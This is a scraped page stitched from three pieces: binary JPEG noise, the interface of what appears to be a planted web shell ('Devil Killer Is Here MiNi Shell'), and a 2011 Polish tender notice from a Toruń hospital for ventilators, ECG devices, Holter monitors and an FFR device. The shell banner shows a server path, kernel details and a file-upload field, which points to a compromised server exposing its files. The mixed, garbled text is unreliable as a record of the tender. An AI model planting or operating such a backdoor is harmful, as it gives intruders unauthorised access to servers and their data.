JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110407/109633-N-2011.html

<p class="kh_header"><b>Toruń: Dostawa 1 kpl. aparatu do pomiaru gradientu przezzwężeniowego FFR z prowadnikami, 
3 szt. respiratorów , 1 szt. elektrokardiografu, 4 szt. holterów EKG.</b><br>
<b>Numer ogłoszenia: 109633 - 2011; data zamieszczenia: 07.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa 1 kpl. aparatu do pomiaru gradientu przezzwężeniowego FFR z prowadnikami, 
3 szt. respiratorów , 1 szt. elektrokardiografu, 4 szt. holterów EKG..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa niżej wymienionego sprzętu medycznego z podziałem na zadania:
Zadanie Nr 1 - 1 kpl. aparatu do pomiaru gradientu przezzwężeniowego FFR 
z prowadnikami<br>
<br>1. Aparat do pomiaru gradientu przezzwężeniowego FFR - 1 szt. 
<br>1.1 Urządzenie przenośne o wadze < 0,3 kg
<br>1.2 Możliwość montażu do statywu albo do stołu zabiegowego
<br>1.3 Monochromatyczny wyświetlacz LCD
<br>1.4 Zakres pomiarów ciśnienia: -30 do + 330 mmHg
<br>1.5 Dokładność pomiaru: ?3 mmHg (w zakresie od -30 do +100 mmHg) i ?3% (powyżej 100 mmHg)
<br>1.6 Podłączenie aparatu FFR za pomocą kabla do istniejącego fizjosystemu 
<br>2. Prowadnik do pomiaru gradientu przezzwężeniowego FFR - 15 szt. 
<br>2.1 Średnica 0,014 cali
<br> 2.2 Długość: 185 cm i 300 cm
<br>2.3 Końcówka prosta i J
<br> 2.4 Miękka, atraumatyczna końcówka
<br>3. Warunki gwarancji i serwisu
<br>3.1 Gwarancja - min. 24 miesiące
<br> 3.2 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.
<br>3.3 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika 
<br>3.4 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>3.5 Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie 
<br>3.6 Bezpłatna instalacja urządzenia 
<br>3.7 Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)
<br>3.8 Instrukcja obsługi w języku polskim 

<br>Zadanie Nr 2 - 3 szt. respiratorów 
<br>1. Zasilanie elektryczne AC 230V 50Hz +/-  10%
<br>2. Respirator wyposażony w pojedynczy, podstawowy  kolorowy ekran LCD min. 12cali regulowany w min. dwóch płaszczyznach (niezależnie od obudowy respiratora)
<br>3. Zasilanie akumulatorowe na minimum 30 min. 
<br>4. Zasilanie w powietrze i tlen medyczny z centralnej szpitalnej instalacji gazów (min. 3 - 6 bar)
<br>5. Możliwość awaryjnej pracy przy zasilaniu tylko jednym gazem (O2 lub powietrze)
<br>6. Wentylacja PCV (ciśnieniowo zmienna)
<br>7.Wentylacja VCV  (objętościowo zmienna)
<br>8. Wentylacja ciśnieniowa dwupoziomowa typu
(Bi-Level, BiPAP, DuoPAP)
<br>9. Wentylacja z zadaną objętością z ograniczeniem ciśnienia
<br>10. Wentylacja wspomagania oddechu spontanicznego ciśnieniem 
<br>11. Wentylacja SIMV kontrolowana objętościowo i ciśnieniowo
<br>12. Wentylacja z zadanym ciśnieniem z gwarantowaną objętością
<br>13.Możliwość ustawienia parametrów wentylacji bezdechu z aktywacją w czasie min. 10 do 60 s.
<br>14. Oddech ręczny
<br>Zakres objętości pojedynczego oddechu  min. 20 - 2000 ml 
<br>15. Zakres częstości oddychania w zakresie od   min. 5 - 120 oddechów/min
<br>16. I:E min. 4:1 do 1:9
<br>17. Ciśnienie wdechowe  min. 5 - 95 cm H2O
<br>18. Ciśnienie wspomagania min. 0 - 50 cm H2O
<br>19. PEEP/CPAP min. do 50 cm H2O
<br>20. Stężenie O2 w mieszaninie oddechowej regulowane płynnie w zakresie min. 21 - 100%
<br>21. Przepływ bazowy regulowany ręcznie w zakresie min. 2-9 L/min
<br>22. Wyzwalanie oddechu - czułość przepływowa regulowana w zakresie min. od 1 - 8 L/min
<br>23. Wyzwalanie oddechu - regulacja (płynna lub skokowa) czułości ciśnieniowej w zakresie min. od -1 do -8 cmH2O
<br>24. Pomiar pojemności życiowej płuc pacjenta - VC
<br>25. Pomiar NIF
<br>26. Procedura P 0.1
<br>27. Nebulizer
<br>28. Monitorowanie stężenia O2 - Pomiar tlenu za pomocą  wewnętrznego, elektronicznego (niechemicznego) czujnika tlenowego nie wymagającego okresowej wymiany
<br>29. Pomiary spirometryczne z kreśleniem minimum  trzech różnych pętli spirometrycznych
<br>30. Monitorowanie częstości oddechów
<br>31. Zatrzymanie wdechu
<br>32. Zatrzymanie wydechu
<br>33. Funkcja ułatwiająca natlenienie pacjenta przed odsysaniem z zatrzymaniem pracy respiratora w trybie gotowość i wyłączenie alarmów na minimum 120 sekund
<br>34. Monitorowanie objętości pojedynczego oddechu i objętości minutowej oddechów kontrolowanych
<br>35. Pomiar oporów i podatności dynamicznej układu oddechowego
<br>36. Regulacja czasu narastania oddechów
<br>37. Monitorowanie ciśnienia minimalnego, szczytowego, średniego
<br>38. Monitorowanie przepływu w układzie pacjenta
<br>39. Pamięć alarmów
<br>40. Alarm bezdechu z możliwością uruchomienia trybu wentylacji bezdechu
<br>41. Alarm objętości minutowej 
<br>42. Alarm ciśnienia w układzie oddechowym 
<br>43. Alarm częstości oddechowej
<br>44. Alarm stężenia tlenu
<br>45. Alarm braku zasilania gazowego i elektrycznego
<br>46. Alarmy techniczne z podaniem informacji w j. polskim
<br>47. Pamięć trendów wszystkich parametrów wentylacji (nastawianych i monitorowanych)  zapisywana i prezentowana w respiratorze min. 7 dni
<br>48. Respirator umieszczony na wózku jezdnym, min. 2 koła z blokadą
<br>49. Obsługa respiratora w języku polskim: menu przycisków , komunikaty ekranowe
<br>50. Sterylizowalny w autoklawie układ oddechowy dla dorosłych: rury oddechowe, złączka Y - 2 kpl. 
<br>51. Filtr HME (sztuczny nos) - 10 szt. dla dorosłych.
<br>52. Instrukcja obsługi w języku polskim wraz ze szkoleniem personelu
<br>53. Warunki gwarancji i serwisu
<br>54. Gwarancja - min. 24 miesiące
<br>55. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.
<br>56. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika 
<br>57. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>58. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie 
<br>59. Bezpłatna instalacja urządzenia 
<br>60.  Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)
<br>61. Instrukcja obsługi w języku polskim 

<br>Zadanie Nr 3 - 1 szt. elektrokardiografu
<br>1. Częstotliwość próbkowania sygnału ekg przez aparat - min. 1000 próbek /s
<br>2. Współczynnik tłumienia szumów przez aparat CMRR>120dB
<br>3. Rozdzielczość sygnału wejściowego aparatu - min. 4 uV
<br>4. Zakres częstotliwości pomiarowej aparatu -  min. 0,05-100Hz
<br>5. Filtr sieciowy 50 Hz
<br>6. Filtr mięśniowy w zakresie od 20 do 150 Hz
<br>7. Niwelowanie płynięcia izolinii (automatyczne sprowadzanie linii zerowej)
<br>8. Kolorowy wyświetlacz graficzny LCD min. 7cali
<br>9. Praca w trybie zasilania sieciowego
<br>10. Praca w trybie zasilania bateryjnego
<br>11. Możliwość monitorowania pacjenta z wewnętrznego akumulatora przez min.3 godziny
<br>12. Czas ładowania akumulatorów max. 2,5 godziny
<br>13. Rejestracja przebiegów na papierze formatu A4
<br>14. Równoczesna rejestracja 12 odprowadzeń
<br>15. Prezentacja graficzna badania w postaci  3, 6 lub 12 krzywych na jednej stronie
<br>16. Wybór różnych raportów w trybie auto
<br>17. Pomiar parametrów krzywej ekg
<br>18. Wykrywanie wszczepionego stymulatora
<br>19. Zabezpieczenie aparatu przed impulsem defibrylacji
<br>20. Klawiatura alfanumeryczna plus klawisze funkcyjne i klawisz nawigacji
<br>21. Masa aparatu do 6 kg 
<br>22. Badanie ekg - tryb manual
<br>23. Badanie ekg - tryb auto
<br>24. Tryb arytmii
<br>25. Czułość (AUTO, 5, 10 , 20, 40 mm/mV)
<br>26. Prędkość wydruku: 5; 12.5; 25; 50 mm/s
<br>27. Wyświetlanie danych pacjenta na ekranie 
<br>28. Wyświetlanie  od 3 do12 przebiegów krzywych EKG na ekranie
<br>29. Identyfikacja grupy odprowadzeń
<br>30. Wynik obliczonego parametru HR
<br>31. Sygnalizacja włączenia / wyłączenia filtrów
<br>32. Wizualna i akustyczna sygnalizacja braku kontaktu elektrod
<br>33. Kabel ekg modułowy z możliwością wymiany pojedynczych przewodów pacjenta 
<br>34. Kabelki pacjenta typu - banan
<br>35. Wyposażenie w elektrody przedsercowe (przyssawkowe) i  kończynowe (klamrowe) 
<br>36. Wózek z pojemnikiem na akcesoria
<br>37. Gniazdo karty pamięci typu SD
<br>38. Wyjście do podłączenia zewnętrznego monitora 
<br>39. Komunikacja z użytkownikiem w języku polskim 
<br>40. Warunki gwarancji i serwisu
<br>41.Okres gwarancji - min 24 miesiące 
<br>42.Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika
<br>43. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat
<br>44. Bezpłatne szkolenie pracowników Zamawiającego  obsługującego urządzenie
<br>45.Instrukcja obsługi w języku polskim
<br>46. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>47. Bezpłatna instalacja urządzenia 
<br>48.Elektrokardiograf zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancyjnym)
<br>Zadanie Nr 4 - 4 szt. holterów EKG <br>
<br>1. Waga bez baterii maks. 65g
<br>2. Wyświetlacz ciekłokrystaliczny min. 1,9 cala
<br>3. Jednoczesna rejestracja sygnału EKG z trzech odprowadzeń z projekcją do 12 odprowadzeń
<br>4. Zdefiniowana rozdzielczość przetwornika analogowo cyfrowego 10 bitów
<br>5. Skokowa regulacja wzmocnienia 0,5x, 1x, 2x
<br>6. Czas rejestracji - 7 dni
<br>7. Częstotliwość próbkowania 175 próbek/sek.
<br>8. Komunikacja z analizatorem poprzez gniazdo USB
<br>9. Weryfikacja jakości sygnału EKG oraz jakości kontaktu elektrod ze skórą poprzez wyświetlacz LCD
<br>10. Rejestracja sygnału EKG bez kompresji
<br>11. Detekcja sygnału ze stymulatora
<br>12. Przycisk zdarzeń aktywny podczas rejestracji sygnału ekg
<br>13. Analiza zarejestrowanego sygnału EKG możliwa przy użyciu analizatora holterowskiego Zymed 1810 będącego własnością Zamawiającego
<br>14. Komunikacja z użytkownikiem w języku polskim. 
<br>15. Warunki gwarancji i serwisu
<br>16. Gwarancja - min. 24 miesiące
<br>17. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.
<br>18. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika 
<br>19. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji
<br>20. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie 
<br>21. Bezpłatna instalacja urządzenia 
<br>22. Instrukcja obsługi w języku polskim
<br>23. Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.15.74.00-9, 33.12.32.00-0, 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych min. 2 dostaw sprzętu medycznego o wartości min. dla poszczególnych zadań:<br>
Zadanie Nr 1 -     42.400,00 zł,<br>
Zadanie Nr 2 -   222.200,00 zł,<br>
Zadanie Nr 3 -     16.300,00 zł,<br>
Zadanie Nr 4 -      29.600,00 zł,<br>
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
Wykonawca składający ofertę na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 
2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 264.600,00 zł każda dostawa.

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:<br>
Zadanie Nr 1 -      50.000,00 zł,<br>
Zadanie Nr 2 -    250.000,00 zł,<br>
Zadanie Nr 3 -      20.000,00 zł,<br>
Zadanie Nr 4 -      30.000,00 zł,<br>
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>
	
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
     
 Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a/ 	zgłoszenie do Prezesa Urzędu Rejestracji Wyrobów Medycznych potwierdzające, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 maja 2010 r. 
o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679) lub aktualny certyfikat zgodności wyrobu z wymaganiami zasadniczymi. 

b/ foldery, katalogi/ prospekty oferowanych wyrobów potwierdzające spełnianie parametrów wymaganych przez Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
* Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1.<br>
*Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg
 spełnienia określonego przez Zamawiającego warunku.<br><br></p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
